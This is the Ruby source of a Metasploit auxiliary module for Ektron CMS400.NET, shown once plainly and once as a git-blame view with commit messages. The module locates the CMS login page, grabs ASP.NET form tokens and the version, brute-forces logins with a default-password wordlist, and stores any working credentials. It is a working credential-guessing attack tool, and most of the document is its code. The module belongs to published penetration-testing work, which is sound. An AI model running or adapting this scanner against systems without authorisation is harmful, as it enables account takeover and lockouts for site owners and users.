metasploit-framework/modules/auxiliary/scanner/http/ektron_cms400net.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
        'Name'          => 'Ektron CMS400.NET Default Password Scanner',
        'Description'   => %q{
          Ektron CMS400.NET is a web content management system based on .NET.
          This module tests for installations that are utilizing default
          passwords set by the vendor. Additionally, it has the ability
          to brute force user accounts. Note that Ektron CMS400.NET, by
          default, enforces account lockouts for regular user account
          after a number of failed attempts.
        },
        'License'       => MSF_LICENSE,
        'Author'        => ['Justin Cacak']
      ))

    register_options(
      [
        OptString.new('URI', [true, "Path to the CMS400.NET login page", '/WorkArea/login.aspx']),
        OptPath.new(
          'USERPASS_FILE',
          [
            false,
            "File containing users and passwords",
            File.join(Msf::Config.data_directory, "wordlists", "cms400net_default_userpass.txt")
          ])
      ], self.class)

    # Set to false to prevent account lockouts - it will!
    deregister_options('BLANK_PASSWORDS')
  end

  def target_url
    # Function to display correct protocol and host/vhost info
    if rport == 443 or ssl
      proto = "https"
    else
      proto = "http"
    end

    uri = normalize_uri(datastore['URI'])
    if vhost != ""
      "#{proto}://#{vhost}:#{rport}#{uri.to_s}"
    else
      "#{proto}://#{rhost}:#{rport}#{uri.to_s}"
    end
  end

    def gen_blank_passwords(users, credentials)
      return credentials
    end

  def run_host(ip)
    begin
      res = send_request_cgi(
      {
        'method'  => 'GET',
        'uri'     => normalize_uri(datastore['URI'])
      }, 20)

      if res.nil?
        print_error("Connection timed out")
        return
      end

      # Check for HTTP 200 response.
      # Numerous versions and configs make if difficult to further fingerprint.
      if (res and res.code == 200)
        print_status("Ektron CMS400.NET install found at #{target_url}  [HTTP 200]")

        #Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
        #Required to be sent based on some versions/configs.
        begin
          viewstate = res.body.scan(/<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*)"/)[0][0]
        rescue
          viewstate = ""
        end

        begin
          eventvalidation = res.body.scan(/<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="(.*)"/)[0][0]
        rescue
          eventvalidation = ""
        end

        get_version

        print_status "Testing passwords at #{target_url}"
        each_user_pass { |user, pass|
          do_login(user, pass, viewstate, eventvalidation)
        }
      else
        print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT.  [HTTP #{res.code}]")
      end

    rescue
      print_error ("Ektron CMS400.NET login page not found at #{target_url}  [HTTP #{res.code}]")
      return
    end
  end

  def get_version
      # Attempt to retrieve the version of CMS400.NET installed.
      # Not always possible based on version/config.
      payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
      res = send_request_cgi(
      {
        'method'  => 'GET',
        'uri'     => payload
      }, 20)

      if (res.body.match(/Version.:.(\d{1,3}.\d{1,3})/))
        print_status "Ektron CMS400.NET version: #{$1}"
      end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: (ssl ? 'https' : 'http'),
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def do_login(user=nil, pass=nil, viewstate_arg=viewstate, eventvalidation_arg=eventvalidation)
    vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")

    post_data =  "__VIEWSTATE=#{Rex::Text.uri_encode(viewstate_arg.to_s)}"
    post_data << "&__EVENTVALIDATION=#{Rex::Text.uri_encode(eventvalidation_arg.to_s)}"
    post_data << "&username=#{Rex::Text.uri_encode(user.to_s)}"
    post_data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"

    begin
      res = send_request_cgi({
        'method'  => 'POST',
        'uri'     => normalize_uri(datastore['URI']),
        'data'    => post_data,
      }, 20)

      if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
        print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)

      elsif(res and res.code == 200)
        vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
      else
        print_error("#{target_url} [Error] Unable to authenticate. Check parameters.  [HTTP #{res.code}]")
        return :abort
      end

    rescue ::Rex::ConnectionError => e
      vprint_error("http://#{tartget_url} - #{e.to_s}")
      return :abort
    end

  end

end
Add aux module CMS400 default pass scanner (feature #6301) 2012-01-30 16:40:59 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add aux module CMS400 default pass scanner (feature #6301) 2012-01-30 16:40:59 +00:00			`##`

Revert "change Metasploit3 class names" This reverts commit 666ae14259085ff71cf1b5966d65c84cd0996c5d. 2016-03-07 19:19:55 +00:00			`class Metasploit3 < Msf::Auxiliary`
Add aux module CMS400 default pass scanner (feature #6301) 2012-01-30 16:40:59 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::AuthBrute`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Ektron CMS400.NET Default Password Scanner',`
			`'Description' => %q{`
			`Ektron CMS400.NET is a web content management system based on .NET.`
			`This module tests for installations that are utilizing default`
			`passwords set by the vendor. Additionally, it has the ability`
			`to brute force user accounts. Note that Ektron CMS400.NET, by`
			`default, enforces account lockouts for regular user account`
			`after a number of failed attempts.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Justin Cacak']`
			`))`

			`register_options(`
			`[`
			`OptString.new('URI', [true, "Path to the CMS400.NET login page", '/WorkArea/login.aspx']),`
			`OptPath.new(`
			`'USERPASS_FILE',`
			`[`
			`false,`
			`"File containing users and passwords",`
Find and replace 2013-09-26 19:34:48 +00:00			`File.join(Msf::Config.data_directory, "wordlists", "cms400net_default_userpass.txt")`
Retab modules 2013-08-30 21:28:54 +00:00			`])`
			`], self.class)`

yard doc and comment corrections for auxiliary 2015-04-03 11:12:23 +00:00			`# Set to false to prevent account lockouts - it will!`
Retab modules 2013-08-30 21:28:54 +00:00			`deregister_options('BLANK_PASSWORDS')`
			`end`

			`def target_url`
yard doc and comment corrections for auxiliary 2015-04-03 11:12:23 +00:00			`# Function to display correct protocol and host/vhost info`
Retab modules 2013-08-30 21:28:54 +00:00			`if rport == 443 or ssl`
			`proto = "https"`
			`else`
			`proto = "http"`
			`end`

			`uri = normalize_uri(datastore['URI'])`
			`if vhost != ""`
			`"#{proto}://#{vhost}:#{rport}#{uri.to_s}"`
			`else`
			`"#{proto}://#{rhost}:#{rport}#{uri.to_s}"`
			`end`
			`end`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00
Better fixes 2013-08-26 19:02:45 +00:00			`def gen_blank_passwords(users, credentials)`
Pow, tab assassinated. 2013-10-02 22:16:38 +00:00			`return credentials`
Better fixes 2013-08-26 19:02:45 +00:00			`end`
[FixRM #8319] - Properly disable BLANK_PASSWORDS for ektron_cms400net In module ektron_cms400net.rb, datastore option "BLANK_PASSWORDS" is set to false by default, because according to the original author, a blank password will result in account lockouts. Since the user should never set "BLANK_PASSWORDS" to true, this option should never be presented as an option (when issuing the "show options"). While fixing #8319, I also noticed another bug at line 108, where res.code is used when res could be nil due to a timeout, so I ended up fixing it, too. 2013-08-20 06:20:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
			`begin`
			`res = send_request_cgi(`
			`{`
			`'method' => 'GET',`
			`'uri' => normalize_uri(datastore['URI'])`
			`}, 20)`

			`if res.nil?`
			`print_error("Connection timed out")`
			`return`
			`end`

yard doc and comment corrections for auxiliary 2015-04-03 11:12:23 +00:00			`# Check for HTTP 200 response.`
			`# Numerous versions and configs make if difficult to further fingerprint.`
Retab modules 2013-08-30 21:28:54 +00:00			`if (res and res.code == 200)`
			`print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")`

			`#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.`
			`#Required to be sent based on some versions/configs.`
			`begin`
			`viewstate = res.body.scan(/<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*)"/)[0][0]`
			`rescue`
			`viewstate = ""`
			`end`

			`begin`
			`eventvalidation = res.body.scan(/<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="(.*)"/)[0][0]`
			`rescue`
			`eventvalidation = ""`
			`end`

fix msftidy warnings 2014-12-12 12:16:21 +00:00			`get_version`
Retab modules 2013-08-30 21:28:54 +00:00
			`print_status "Testing passwords at #{target_url}"`
			`each_user_pass { \|user, pass\|`
			`do_login(user, pass, viewstate, eventvalidation)`
			`}`
			`else`
			`print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT. [HTTP #{res.code}]")`
			`end`

			`rescue`
			`print_error ("Ektron CMS400.NET login page not found at #{target_url} [HTTP #{res.code}]")`
			`return`
			`end`
			`end`

fix msftidy warnings 2014-12-12 12:16:21 +00:00			`def get_version`
yard doc and comment corrections for auxiliary 2015-04-03 11:12:23 +00:00			`# Attempt to retrieve the version of CMS400.NET installed.`
			`# Not always possible based on version/config.`
Retab modules 2013-08-30 21:28:54 +00:00			`payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"`
			`res = send_request_cgi(`
			`{`
			`'method' => 'GET',`
			`'uri' => payload`
			`}, 20)`

			`if (res.body.match(/Version.:.(\d{1,3}.\d{1,3})/))`
			`print_status "Ektron CMS400.NET version: #{$1}"`
			`end`
			`end`

Using the new cred API for multiple auxiliary modules 2015-06-15 21:06:57 +00:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:ip],`
			`port: opts[:port],`
			`service_name: (ssl ? 'https' : 'http'),`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
			`private_type: :password`
			`}.merge(service_data)`

			`login_data = {`
			`last_attempted_at: DateTime.now,`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::SUCCESSFUL,`
Modate update on using metasploit-credential Update some more modules to usethe new cred API. Also, make sure to always provide proof because that seems handy. 2015-07-23 23:07:19 +00:00			`proof: opts[:proof]`
Using the new cred API for multiple auxiliary modules 2015-06-15 21:06:57 +00:00			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

ruby 2.2 compatibility Fix circular argument reference warnings for ruby 2.2 2015-01-07 10:00:50 +00:00			`def do_login(user=nil, pass=nil, viewstate_arg=viewstate, eventvalidation_arg=eventvalidation)`
Retab modules 2013-08-30 21:28:54 +00:00			`vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")`

ruby 2.2 compatibility Fix circular argument reference warnings for ruby 2.2 2015-01-07 10:00:50 +00:00			`post_data = "__VIEWSTATE=#{Rex::Text.uri_encode(viewstate_arg.to_s)}"`
			`post_data << "&__EVENTVALIDATION=#{Rex::Text.uri_encode(eventvalidation_arg.to_s)}"`
Retab modules 2013-08-30 21:28:54 +00:00			`post_data << "&username=#{Rex::Text.uri_encode(user.to_s)}"`
			`post_data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"`

			`begin`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => normalize_uri(datastore['URI']),`
			`'data' => post_data,`
			`}, 20)`

			`if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)`
			`print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")`
Modate update on using metasploit-credential Update some more modules to usethe new cred API. Also, make sure to always provide proof because that seems handy. 2015-07-23 23:07:19 +00:00			`report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)`
Retab modules 2013-08-30 21:28:54 +00:00
			`elsif(res and res.code == 200)`
			`vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")`
			`else`
			`print_error("#{target_url} [Error] Unable to authenticate. Check parameters. [HTTP #{res.code}]")`
			`return :abort`
			`end`

			`rescue ::Rex::ConnectionError => e`
			`vprint_error("http://#{tartget_url} - #{e.to_s}")`
			`return :abort`
			`end`

			`end`
Add aux module CMS400 default pass scanner (feature #6301) 2012-01-30 16:40:59 +00:00
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`end`